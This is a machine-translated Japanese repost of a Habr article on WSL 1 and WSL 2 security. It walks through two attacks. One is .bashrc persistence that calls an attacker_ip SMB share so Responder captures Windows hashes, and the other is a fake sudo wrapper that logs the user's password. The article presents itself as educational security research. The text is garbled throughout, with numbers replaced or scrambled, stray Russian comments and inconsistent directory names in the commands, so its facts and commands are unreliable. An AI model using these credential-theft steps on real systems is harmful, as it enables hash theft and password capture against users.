WSLの実験。 パート1

こんにちは、ハブル！ OTUS が XNUMX 月に新しいコース ストリームを開始 「Linuxのセキュリティ」。 コースの開始に先駆けて、私たちの教師の一人、アレクサンダー・コレスニコフが書いた記事を皆さんと共有します。

2016 年、Microsoft は新しい WSL テクノロジーを IT コミュニティに導入しました (Wインドウ Sのサブシステム Linux) により、将来的には、一般の OS ユーザーと上級 OS ユーザーの両方の間で人気を争っていた、以前は相容れない競合相手である Windows と Linux を統合することが可能になりました。 このテクノロジーにより、マルチブートなどを使用して、Linux を実行する必要がなく、Windows 環境で Linux OS ツールを使用できるようになりました。 Habr では、WSL を使用する利点について説明した多数の記事を見つけることができます。 ただし、残念ながら、この記事の作成時点では、このようなオペレーティング システムの共生のセキュリティに関する研究はこのリソースには見つかりませんでした。 この投稿はこれを修正する試みになります。 この記事では、WSL 1 および 2 アーキテクチャの機能について説明し、これらのテクノロジを使用したシステムへの攻撃の例をいくつか検討します。 この記事は 2 つの部分に分かれています。 最初のセクションでは、Linux と Windows からの主な理論上の攻撃方法を説明します。 XNUMX 番目の記事では、テスト環境のセットアップと攻撃の再現について説明します。

WSL 1: アーキテクチャ上の特徴

WSL のセキュリティ問題を最も正確に理解するには、サブシステムの実装に関連する主なニュアンスを判断する必要があります。 WSL によって解決される主なユーザー タスクの 10 つは、Windows OS を実行しているホスト上の Linux ターミナルを介して作業できることです。 また、提供される互換性は非常にネイティブなので、Linux 実行可能ファイル (ELF) を Windows システム上で直接実行できます。 これらの目標を達成するために、一連の特定のシステム コールを使用して Linux アプリケーションを実行できるようにする特別なサブシステムが Windows XNUMX で作成されました。そのため、一連の Linux システム コールを Windows にマッピングする試みが行われました。 これは、新しいドライバーと新しいプロセス形式を追加することで物理的に実装されました。 視覚的には、アーキテクチャは次のようになります。

実際、Linux オペレーティング システムとの対話は、いくつかのカーネル モジュールと特殊なタイプのプロセスである pico を通じて組織されていました。 上の図から、ホスト上の Linux インスタンスで実行されるプロセスはネイティブである必要があり、通常の Windows アプリケーションと同じリソースを使用する必要があることがわかります。 しかし、どうやってこれを達成するのでしょうか? プロジェクト中 Drawbridge Windows のプロセス概念は、別の OS のアプリケーションを実行するために必要なオペレーティング システムのすべてのコンポーネント (バージョンに応じて) を提供するように開発されました。

提案された抽象化により、別の OS のプロセスが起動することが予想されるオペレーティング システム (特に Windows) に焦点を当てないことが可能になり、一般的なアプローチが提案されたことに注意してください。

したがって、pico プロセス内のアプリケーションは Windows カーネルに関係なく実行できます。

1. 互換性とシステム コールの変換の問題は、特別なプロバイダーによって解決される必要があります。
2. アクセス制御はセキュリティ モニターを通じて行う必要があります。 モニターはカーネル内に配置されているため、Windows では、そのようなプロセスのプロバイダーとして機能する新しいドライバーの形式でアップグレードする必要がありました。 プロトタイプの pico プロセスを以下に概略的に示します。

Linux ファイル システムでは大文字と小文字が区別されるファイル名とディレクトリ名が使用されるため、WSL で動作するために Windows に 2 種類のファイル システム (VolFS と DriveFS) が追加されました。 VolFS は Linux ファイル システムの実装であり、DriveFS は Windows ルールに従って動作するファイル システムですが、大文字と小文字の区別を選択する機能があります。

WSL 2

WSL 1 には、最大限の範囲のタスクを解決するために使用することを許可しない多くの制限がありました。たとえば、WSL 32 には 2020 ビット Linux アプリケーションを実行する機能がなく、デバイス ドライバーを使用することもできませんでした。 そこで 2 年に WSL 2 がリリースされ、サブシステム構築のアプローチが変わりました。 WSL 1 は、WSL 2 のリソース消費特性と一致する最適化された仮想マシンです。 Windows OS ユーザーが解決した問題に応じて、Linux サブシステムの必要なバージョンを選択できるようになりました。 潜在的な脆弱性を軽減するために、WSL 10 は Windows 1 の Hyper-V に基づいて実装されました。この形式では、Windows は Linux オペレーティング システム カーネルを分離して実行する機能を備えています。 WSL バージョン XNUMX は、この分野における Windows 開発の方向性を示すことを目的としたベータ機能として導入されたため、Hyper-V への移行は避けられなかったことを覚えておく価値があります。 最終的なアーキテクチャは次のようになります。

このバージョンでは、Windows カーネルと Linux カーネルには独自のリソースがあり、交差はファイル システム内にのみ存在しますが、この交差は完全ではありません。 ファイル システム間の対話は、9P プロトコルを使用して動作するクライアント/サーバー ラッパーを通じて実行されます。

現在、Microsoft は WSL 1 と WSL 2 を切り替える機能を提供しています。どちらのバージョンも使用できます。

WSLセキュリティ

現時点では、正規の OS ツールを使用してサブシステム間の通信を攻撃するアプローチを説明した著作がいくつかあります。 執筆時点では、彼らのスクリプトを使用して攻撃の関連性を確認します。 攻撃とシナリオの一般的なリスト:

1. ファイル システムの実装: アクセス権、共有ディレクトリ/データ交換メカニズムの可用性。

からのアクセス ルールの違反を特定するために調査が実施されました。 Linux FS -> Windows FS、Windows FS -> Linux FS。 研究により、ターゲット OS 内の特定のファイルを変更できることが実証されています。 ファイル システムの一部を置き換えたり、複製を作成したり、削除したりする試みも行われました。

シナリオ：

• A. Windows オペレーティング システムからの攻撃 - Linux OS の /etc ディレクトリにあるファイルの変更。
• B. Linux オペレーティング システムからの攻撃 - ディレクトリ内のファイルの変更: C:Windows, C:Program Files, C:Users<User>

2. ネットワークスタックの実装。

この調査は、Windows 上の Linux オペレーティング システムからの攻撃の例を使用して実施されました。 ネットワーク スタックの機能、つまりさまざまなリソース上の認証メカニズムが使用されました。

シナリオ：

• Windows システムで占有されているポートへのアクセスを開く
• 適切な権限を持たずにポートを開く
• Windows オペレーティング システムで elf ファイルを使用してリバース シェルを実行します。

3. WSL サブシステムを使用して、悪意のあるソフトウェア プロセスの起動を隠します。

この調査は単純な事実に基づいています。WSL 1 の場合、セキュリティ サブシステムは、オペレーティング システムから正規のプロバイダを使用して動作する別のカーネル内のイベントを傍受できません。WSL 2 の場合、発生したイベントを表示する方法はありません。軽量仮想マシン内の別のカーネル内。

シナリオ：

1) システムにリモート アクセスするためのアプリケーションを起動し、ログに記録されたイベントを表示します。

WSL 1 の実験: ハッシュ インターセプト (Windows)

いよいよ実践編に入ります。 まず、テスト環境をセットアップする必要があります。 すべての実験は、Windows 10 2004 がインストールされたベンチで実行され、WSL のオペレーティング システム イメージとして Ubuntu 18.04 イメージが選択されました。 画像はランダムに選択されており、他の画像も同様に機能します。 スタンドをセットアップするためのコマンド:

最初に起動する必要があります powershell.exe 管理者として。

WSL 1 の場合は、次のコマンドを実行する必要があります。

1. Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux #Включить функцию WSL
2. Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804

-OutFile ~/Ubuntu.appx -UseBasicParsing #Загрузить образ Linux из магазина Microsoft

Ubuntu.appx install —root #Установим образ

Возможно, придется прокликать процесс настройки и создать нового пользователя, который будет иметь меньше прав, чем root. Для наших тестов это будет обычный пользователь sam.

Restart-Computer #Перезагрузим

スタンドを再起動した後、bash コマンドを呼び出すことができます。 すべてが正しく動作すると、Windows コンソールに次のような出力が表示されます。

攻撃者のマシンとして Kali Linux ディストリビューションを使用します。すべてのマシンが同じローカル ネットワーク上に存在する必要があります。

Windows マシン上で WSL に非特権アクセス権があると仮定しましょう。 Linux からコマンドを呼び出して、Linux オペレーティング システムを攻撃してみましょう。 攻撃を実装するには、単純な自動実行手法を使用します。Linux 環境で実行するためのスクリプトを追加します。 これを行うには、ファイルを変更する必要があります .bashrc.

WSL を備えたマシン上で次を実行します。

	1. bash
	2. Переходим в домашнюю директорию пользователя: cd /home/sam/
	2. echo  «/home/sam/.attack.sh» >> .bashrc
	3. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
	4. chmod u+x .attack.sh
	5. exit

Kali Linux マシン上で以下を実行します。

1. Responder -I eth0 -rdvw

Windows マシンで、bash を起動しましょう。

Kali Linux マシンで結果を待っています。

したがって、Linux システム上でコマンドを実行することにより、WSL サブシステムを通じて Windows ユーザー ハッシュを取得しました。

WSL 1 の実験: ユーザー パスワードの取得 (Linux OS)

もう一つ実験してみましょう。 このチェック中に、ファイルに追加します .bashrc Linux オペレーティング システムのユーザー パスワードを取得するには、いくつかのコマンドを実行します。

bash を起動してコマンドを入力しましょう。

1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit

攻撃を正常に完了するには、ユーザー Sam は Linux ターミナルで sudo を呼び出す必要があります。 この後、Linux OS ユーザーのパスワードがファイルに保存されます。 pass.txt:

攻撃の実装は理論上の情報としてのみ提供されています。

記事の次の部分では、9P プロトコルの実装について説明し、このプロトコル用のスキャナーの作成を検討し、それを使用した攻撃の実行についても説明します。

参考文献

• WSL 2 の悪さの研究
• Linux 用 Windows サブシステムのドキュメント

続きを読む

• リアルタイム Linux カーネル パッチ適用ソフトウェアの選択方法

出所： habr.com